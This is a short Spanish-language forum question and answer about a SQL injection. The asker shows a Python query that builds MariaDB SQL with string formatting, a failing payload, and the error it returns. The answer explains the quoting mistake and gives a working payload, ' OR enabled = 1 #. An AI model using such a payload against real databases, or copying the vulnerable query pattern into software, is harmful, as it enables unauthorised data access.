SQl Injection MariaDB

0

Encontré una consulta de SQL que se puede inyectar a continuación

"car_info = query("select models, color, running from cars where manual = 1 AND UID = '{}' LIMIT 1".format(uid))")

Donde '{}' es el punto de inyección.

La carga útil que estoy tratando de ingresar es:

' OR enabled = 1") #

Se me devuelve un error a continuación:

(1064, u\"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')#' LIMIT 1' at line 1\

¿Cómo puedo conseguir que esto se ejecute correctamente? Siento que estoy cerca.

    
pregunta Hysii 22.12.2018 - 21:56
fuente

1 respuesta

1

Si estoy leyendo la sintaxis correctamente, creo que debe eliminar sus citas y el paréntesis izquierdo , ya que está terminando prematuramente la función de consulta:

car_info = query("select models, color, running from cars where manual = 1 AND UID = '' OR enabled = 1 # LIMIT 1".format(uid))")

Estás publicando:

car_info = query("select models, color, running from cars where manual = 1 AND UID = '' OR enabled = 1" )# LIMIT 1".format(uid))")

Prueba la carga útil:

' OR enabled = 1 #
    
respondido por el Evan Pederson 22.12.2018 - 23:09
fuente

Lea otras preguntas en las etiquetas